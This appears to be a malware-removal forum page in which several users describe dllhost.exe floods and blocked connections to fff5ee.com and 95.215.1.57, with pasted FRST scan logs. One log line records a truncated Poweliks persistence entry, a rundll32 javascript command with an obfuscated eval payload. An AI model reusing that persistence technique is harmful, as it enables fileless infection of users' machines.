the fixlist, the file\folder will be moved.) 2014-10-26 22:31 - 2011-06-04 09:46 - 00000000 ____D () C:\Users\Jack\Documents\Quicknote 2014-10-26 22:17 - 2012-04-08 12:31 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2014-10-26 22:03 - 2011-08-14 20:14 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-10-26 21:50 - 2009-07-14 01:10 - 02012760 _____ () C:\Windows\WindowsUpdate.log 2014-10-26 21:49 - 2009-07-14 00:45 - 00014560 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-10-26 21:49 - 2009-07-14 00:45 - 00014560 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-10-26 21:45 - 2011-08-02 07:59 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3994650508-1294297652-2827424591-1000UA.job 2014-10-26 21:45 - 2011-07-18 13:43 - 00000199 _____ () C:\Windows\wstdUPSWSHIP.INI 2014-10-26 21:44 - 2011-08-14 20:14 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-10-26 21:44 - 2011-07-16 07:39 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\The Bat! 2014-10-26 21:44 - 2011-03-10 15:20 - 00001419 _____ () C:\Users\Jack\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-10-26 21:44 - 2011-03-10 15:20 - 00000000 ____D () C:\Users\Jack\AppData\Local\SoftThinks 2014-10-26 21:43 - 2012-09-01 13:34 - 00000000 ____D () C:\Program Files (x86)\CyberPower PowerPanel Personal Edition 2014-10-26 21:43 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-10-26 21:40 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\PolicyDefinitions 2014-10-26 21:29 - 2012-11-25 15:46 - 00004182 _____ () C:\Windows\System32\Tasks\avast! 
Emergency Update 2014-10-26 21:25 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\Web 2014-10-26 21:17 - 2011-04-16 07:58 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\SQLyog 2014-10-26 21:10 - 2013-09-14 09:54 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-10-26 21:08 - 2013-02-28 22:18 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Malwarebytes 2014-10-26 21:08 - 2013-02-28 22:18 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-10-26 20:38 - 2011-07-18 13:27 - 00000000 ____D () C:\UPS 2014-10-26 13:52 - 2011-08-02 07:59 - 00000000 ____D () C:\Users\Jack\AppData\Local\Google 2014-10-26 13:51 - 2011-08-14 20:14 - 00000000 ____D () C:\Program Files (x86)\Google 2014-10-26 12:45 - 2011-08-02 07:59 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3994650508-1294297652-2827424591-1000Core.job 2014-10-26 12:29 - 2011-09-14 11:39 - 00000000 ____D () C:\Storage 2014-10-26 10:26 - 2011-03-10 15:20 - 00000000 ____D () C:\Users\Jack\AppData\Local\VirtualStore 2014-10-26 01:01 - 2009-07-14 01:32 - 00000000 ____D () C:\Windows\system32\FxsTmp 2014-10-25 23:22 - 2012-12-14 10:50 - 00000000 ___RD () C:\Users\Jack\Sync 2014-10-25 22:52 - 2011-03-23 12:35 - 00000000 ____D () C:\Windows\Minidump 2014-10-25 22:19 - 2013-04-24 23:24 - 00000000 ____D () C:\ProgramData\Norton 2014-10-25 21:55 - 2014-05-12 12:06 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\IObit 2014-10-25 21:55 - 2014-05-12 12:06 - 00000000 ____D () C:\ProgramData\IObit 2014-10-25 21:55 - 2014-05-12 12:06 - 00000000 ____D () C:\Program Files (x86)\IObit 2014-10-25 20:59 - 2012-12-23 15:19 - 00000000 ____D () C:\Users\Jack\AppData\Local\CrashDumps 2014-10-25 10:45 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\rescache 2014-10-25 08:51 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK 2014-10-25 08:51 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\SysWOW64\tr-TR 2014-10-25 08:50 - 2009-07-13 23:20 - 00000000 ____D () 
C:\Windows\system32\zh-HK 2014-10-25 08:50 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\system32\tr-TR 2014-10-25 08:42 - 2011-06-11 21:18 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Arcsoft 2014-10-25 00:02 - 2011-02-09 15:03 - 00000000 ____D () C:\Windows\Panther 2014-10-24 22:15 - 2011-04-20 22:51 - 00000600 _____ () C:\Users\Jack\PUTTY.RND 2014-10-24 20:32 - 2011-05-18 03:30 - 00000000 ____D () C:\Windows\system32\inf32 2014-10-24 13:32 - 2011-07-15 09:58 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\FileZilla 2014-10-23 10:31 - 2013-10-18 00:05 - 00000000 ____D () C:\ProgramData\Oracle 2014-10-23 10:31 - 2013-07-21 10:37 - 00000000 ____D () C:\Program Files (x86)\Java 2014-10-23 10:26 - 2014-07-02 21:37 - 00000000 ____D () C:\Users\Jack\AppData\Local\Adobe 2014-10-23 10:26 - 2012-04-08 12:31 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-10-23 10:26 - 2012-04-08 12:31 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater 2014-10-23 10:26 - 2011-05-21 11:06 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-10-23 10:22 - 2012-04-07 13:20 - 00002110 _____ () C:\Users\Jack\Sti_Trace.log 2014-10-21 22:58 - 2011-08-14 20:14 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-10-21 22:58 - 2011-08-14 20:14 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-10-21 12:40 - 2011-08-02 07:59 - 00003876 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3994650508-1294297652-2827424591-1000UA 2014-10-21 12:40 - 2011-08-02 07:59 - 00003480 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3994650508-1294297652-2827424591-1000Core 2014-10-21 11:06 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\system32\NDF 2014-10-19 21:24 - 2011-02-09 13:52 - 00000000 ____D () C:\Program Files (x86)\AlienRespawn 2014-10-17 22:56 - 2009-07-14 00:45 - 00353584 _____ () 
C:\Windows\system32\FNTCACHE.DAT 2014-10-17 22:52 - 2009-07-14 01:13 - 00860406 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-10-17 22:45 - 2013-07-27 09:17 - 00000000 ____D () C:\Windows\system32\MRT 2014-10-17 13:26 - 2011-03-11 13:16 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Adobe 2014-10-17 13:26 - 2011-02-09 13:51 - 00000000 ____D () C:\ProgramData\Adobe 2014-10-15 20:05 - 2012-10-21 21:39 - 00000000 ____D () C:\Users\Jack\.gimp-2.8 2014-10-09 22:29 - 2011-12-29 22:05 - 00000000 ____D () C:\Users\Jack\AppData\Local\Apple Computer 2014-10-08 22:50 - 2011-12-29 22:05 - 00002503 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk 2014-10-08 22:39 - 2011-12-29 22:05 - 00155180 ____H () C:\Windows\SysWOW64\mlfcache.dat 2014-10-07 18:45 - 2009-07-14 01:08 - 00032586 _____ () C:\Windows\Tasks\SCHEDLGU.TXT 2014-10-03 10:02 - 2011-03-27 22:22 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2014-10-02 15:53 - 2011-03-13 00:25 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2014-10-01 11:11 - 2013-09-14 09:54 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-09-28 20:39 - 2012-04-26 07:48 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) 
C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-26 16:53 ==================== End Of Log ============================
  15. Hi everyone, my problem is similar to what I have seen from multiple people on the site, but all the solutions are personalized so I was hoping someone could help me out with my problem. About a week ago my computer started running very slow, and when looking into it I saw many (8 or so) dllhost.exe processes running. The processes start themselves back up when ended. I noticed that when I restart my computer they don't appear until I connect to the internet (until then there are only 2). Also the slowing doesn't happen until I connect to the internet. I downloaded Malwarebytes and a malicious website blockage kept popping up. Most of the time there was no domain, but if there was it would be fff5ee.com or some blinkx website (I don't remember the exact name, but can get it if requested). The blockage was always through dllhost.exe though. I ran a scan with Malwarebytes and didn't find anything. I then changed the setting to add 'scan for rootkits' and reran. Found four threats and quarantined them. Didn't help. So then I downloaded and ran FRST. I attached the results from the second Malwarebytes scan and the FRST scan. Thanks in advance for the help! -Jeff Addition.txt FRST.txt MWB_log.txt
  16. Hello, the constant pop-up of the Malicious Website Blocked is annoying me. It goes away, then comes back after a while. The only process causing it is dllhost.exe, but now it stopped; there is the same process, but it doesn't have "dllhost.exe*32 Com Surrogate". Without it that process is harmless. It attempts outbound connections to the following: fff5ee.com (Most Common) IP: 31.184.192.90 port: 51197, 51324, 51327. Unknown Domain (Very Uncommon but happens) IP: 95.215.1.57 Port: 511224, 51235, 51240. Sorry I took so long, I was trying to gather all I could about these two.
  17. Hello! I've just finished all-around sweeps for infections using MBAM, Super Antispyware, Spybot, Hitmanpro, Hijackthis, Tdsskiller, Kaspersky, and Avira. (Individually installed/removed to avoid conflicts.) The machine is running well as of now, but MBAM is detecting dllhost.exe as an infection and it is constantly up. I've done a bit of googling and found that the file is a common target for specific types of infections, but I cannot make any modifications to the file. Any ideas? I've attached a photo of the detection as well. Thanks in advance! FRST.txt Addition.txt
  18. Hello, new here. For the past few days, I have been noticing that several instances of dllhost.exe have been popping up, taking up a TON of memory and CPU, only to be stopped by repetitive task ending. Let this be known: I personally have not pirated anything in a long time, due to the fact that I just didn't like the whole feel of it, BUT I allow my broke sister to use it sometimes and she tends to download stuff when she shouldn't and hides it where I don't find it. I know that some stuff may still be left over, but I've done a lot of cleaning up and there shouldn't be that much if anything left over. So, I've done several scans with Malwarebytes and by looking at other threads and posts by others around different sites as well, it'd seem that I need to get help from people who know what they're doing. Please. PLEASE help me! It's super annoying and the addresses and IPs Malwarebytes is detecting are very very concerning.
  19. I'm positive that my PC is infected by several viruses/malware. It started with the PC becoming slow at times, and I ignored it, thinking it might be some usual Windows/PC issues. Then a few days later it started to freeze when opening Google Chrome. I scanned using Bitdefender and found threats (something by the name 'tribalfusion' and a few others) which were removed. But the problems still persisted and the PC was getting slower and slower, and I started suspecting a virus attack. Then it became sure when the computer started behaving very weird: icons and shortcuts I didn't create found on the desktop, unable to run Windows security, automatically changing the system time, etc. I searched online and found a guide which suggested a comprehensive fix. The first step was running Kaspersky TDSSKiller, which the virus prevented (crashed every time). Then I rebooted in safe mode and ran it again (without checking 'loaded modules') and this time it was running. This was followed by a series of antimalware programs (all running in safe mode) like Malwarebytes Anti-Malware, Hitman Pro, Rogue Killer, etc., none of which found any potential threats. The condition of the system is the same and not yet fixed, and in the task manager I can see processes by the name 'dllhost.exe, ctfmon.exe, runtimebroker.exe' etc. and several instances of svchost.exe which I'm sure are viruses. Please help me out, as I prefer fixing the issue over reinstalling the OS, which will be a big hassle for me. Thank you.
  20. So my computer keeps freezing and Malwarebytes keeps blocking malicious websites from sysWOW64dllhost. Can somebody please help me? I stop all of the dllhost*32 processes but they just pop right back up. I usually get about 30 of them at once. My Norton picks up nothing and my Malwarebytes doesn't pick up anything either. I tried everything I can think of, please help. My computer is useless like this because it keeps freezing up.
  21. This PC became infected before MalwareBytes was installed. It was runnint ESET antivirus software. The original symptom is CPU being completely maxed with MANY instances of dllhost / COM Surrogate running. These only get generated when connected to a network. With WIFI disabled, the PC does not generate these. After installing MalwareBytes Premium, numerous files were detected and cleaned, but the problem persists. In addition, every 3-5 seconds, MalwareBytes detects and blocks a "malicious website". These sites vary, but I see a lot of "95.215.1.57" and "fffsee.com". I ran FRST and below are the logs requested. Thank you for any help you are able to provide. FRST.TXT: =============================================================================================== Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-09-2014 Ran by Nikki (administrator) on LAPTOP-NIKKI on 24-09-2014 03:57:30 Running from H:\ Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe (Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe (Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe (Wave Systems Corp.) 
C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AEstSrv.exe (APN LLC.) C:\Program Files\AskPartnerNetwork\Toolbar\apnmcp.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX86\officeclicktorun.exe (ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe (Pro Softnet Corporation) C:\IDrive\IDriveE Service.exe (Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe (O2Micro International) C:\Windows\System32\drivers\o2flash.exe (Paramount Software UK Ltd) C:\Program Files\Macrium\Reflect\ReflectService.exe (Rosetta Stone Ltd.) C:\Program Files\RosettaStoneLtdServices\RosettaStoneDaemon.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE (Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE (Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe ( ) C:\IDrive\IDrivePlugin.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (IDT, Inc.) C:\Program Files\IDT\WDM\sttray.exe () C:\Program Files\STMicroelectronics\AccelerometerP11\FF_Protection.exe (ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe (APN) C:\Program Files\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe (Alps Electric Co., Ltd.) 
C:\Program Files\DellTPad\hidfind.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe (Pro Softnet Corp.) C:\IDrive\IDriveETray.exe (Pro-SoftNet Corp, U.S.A) C:\IDrive\IDriveEBackground.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\MSOSYNC.EXE (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe (Microsoft Corporation) C:\Windows\System32\wuauclt.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX86\officec2rclient.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) 
C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [505720 2011-07-20] (Alps Electric Co., Ltd.) HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [536668 2011-01-24] (IDT, Inc.) HKLM\...\Run: [FreeFallProtection] => C:\Program Files\STMicroelectronics\AccelerometerP11\FF_Protection.exe [686704 2010-12-17] () HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [5110672 2013-09-12] (ESET) HKLM\...\Run: [nwiz] => C:\Program Files\NVIDIA Corporation\nview\nwiz.exe [2602784 2013-12-04] () HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM\...\Run: [ApnTBMon] => C:\Program Files\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe [1942424 2014-08-29] (APN) Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.) HKU\S-1-5-21-475017880-3412151489-2877756071-1003\...\Run: [iDriveE Startup] => C:\IDrive\IDrvieEStartup.exe [185800 2011-06-24] (Pro Softnet Corporation) HKU\S-1-5-21-475017880-3412151489-2877756071-1003\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-08-18] (Google Inc.) 
HKU\S-1-5-21-475017880-3412151489-2877756071-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-475017880-3412151489-2877756071-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [iDriveE Startup] => C:\IDrive\IDrvieEStartup.exe [185800 2011-06-24] (Pro Softnet Corporation)
HKU\S-1-5-21-475017880-3412151489-2877756071-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-08-18] (Google Inc.)
AppInit_DLLs: C:\Windows\system32\nvinit.dll => C:\Windows\system32\nvinit.dll [156256 2013-12-04] (NVIDIA Corporation)
Lsa: [Authentication Packages] msv1_0 wvauth
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dell System Manager.lnk
ShortcutTarget: Dell System Manager.lnk -> C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe (Dell Inc.)
Startup: C:\Users\Nikki\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IDrive Tray.lnk
ShortcutTarget: IDrive Tray.lnk -> C:\IDrive\IDriveEReg2ini.exe (Pro Softnet Corp.)
ShellIconOverlayIdentifiers: EnabledUnlockedFDEIconOverlay -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: UninitializedFdeIconOverlay -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/webhp?sourceid=navclient&ie=UTF-8&gws_rd=ssl SearchScopes: HKCU - DefaultScope {09CE4A42-A9A2-49DD-A0E0-06D95FCBB159} URL = http://www.search.ask.com/web?tpid=ORJ-ST-SPE&o=APN11460&pf=V7&p2=^BE6^OSJ000^YY^US&gct=&itbv=12.16.2.54&apn_uid=1F10A509-ADE8-4C22-8355-BB14ED0C6DA0&apn_ptnrs=BE6&apn_dtid=^OSJ000^YY^US&apn_dbr=ie_11.0.9600.17280&doi=2014-09-17&trgb=IE&q={searchTerms}&psv=&pt=tb SearchScopes: HKCU - URL http://search.conduit.com/Results.aspx?ctid=CT3323878&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SP1B2D0F91-D6D0-4410-902F-EED2BE72CC0B&q={searchTerms}&SSPV= SearchScopes: HKCU - SuggestionsURL_JSON http://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms} SearchScopes: HKCU - {01D17C2A-FD50-4CE9-B069-076D6DF7C0A5} URL = https://www.google.com/search?q={searchTerms} SearchScopes: HKCU - {09CE4A42-A9A2-49DD-A0E0-06D95FCBB159} URL = http://www.search.ask.com/web?tpid=ORJ-ST-SPE&o=APN11460&pf=V7&p2=^BE6^OSJ000^YY^US&gct=&itbv=12.16.2.54&apn_uid=1F10A509-ADE8-4C22-8355-BB14ED0C6DA0&apn_ptnrs=BE6&apn_dtid=^OSJ000^YY^US&apn_dbr=ie_11.0.9600.17280&doi=2014-09-17&trgb=IE&q={searchTerms}&psv=&pt=tb BHO: Shopping App by Ask -> {4F524A2D-5354-2D53-5045-7A786E7484D7} -> C:\Program Files\AskPartnerNetwork\Toolbar\ORJ-ST-SPE\Passport.dll (APN LLC.) BHO: Ask Toolbar -> {4F524A2D-5637-4300-76A7-7A786E7484D7} -> C:\Program Files\AskPartnerNetwork\Toolbar\ORJ-V7C\Passport.dll (APN LLC.) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) 
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation) Toolbar: HKLM - Ask Toolbar - {4F524A2D-5637-4300-76A7-7A786E7484D7} - C:\Program Files\AskPartnerNetwork\Toolbar\ORJ-V7C\Passport.dll (APN LLC.) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) Toolbar: HKLM - Shopping App by Ask - {4F524A2D-5354-2D53-5045-7A786E7484D7} - C:\Program Files\AskPartnerNetwork\Toolbar\ORJ-ST-SPE\Passport.dll (APN LLC.) Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation) Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 FireFox: ======== FF ProfilePath: C:\Users\Nikki\AppData\Roaming\Mozilla\Firefox\Profiles\zlrlv7md.default FF SelectedSearchEngine: Google FF Homepage: https://www.google.com/?gws_rd=ssl FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll () FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation) FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation) FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program 
Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-03-08] Chrome: ======= CHR HomePage: Default -> FD2CDB8F12BBBE701DB84B78126884CB69BD9F81538EA0F5E6E30AB95EF6433F CHR DefaultSearchKeyword: Default -> E9A44F1AD69990680DA158AFFDC8E360E82408F199F222DF9436CB027365880C CHR DefaultSearchURL: Default -> 1FD560904E47B2C529B14DD7DC7181515BE594723CF5014D573428705F485C23 CHR CustomProfile: C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-08-18] CHR Extension: (Google Drive) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-08-18] CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-08-19] CHR Extension: (YouTube) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-08-18] CHR 
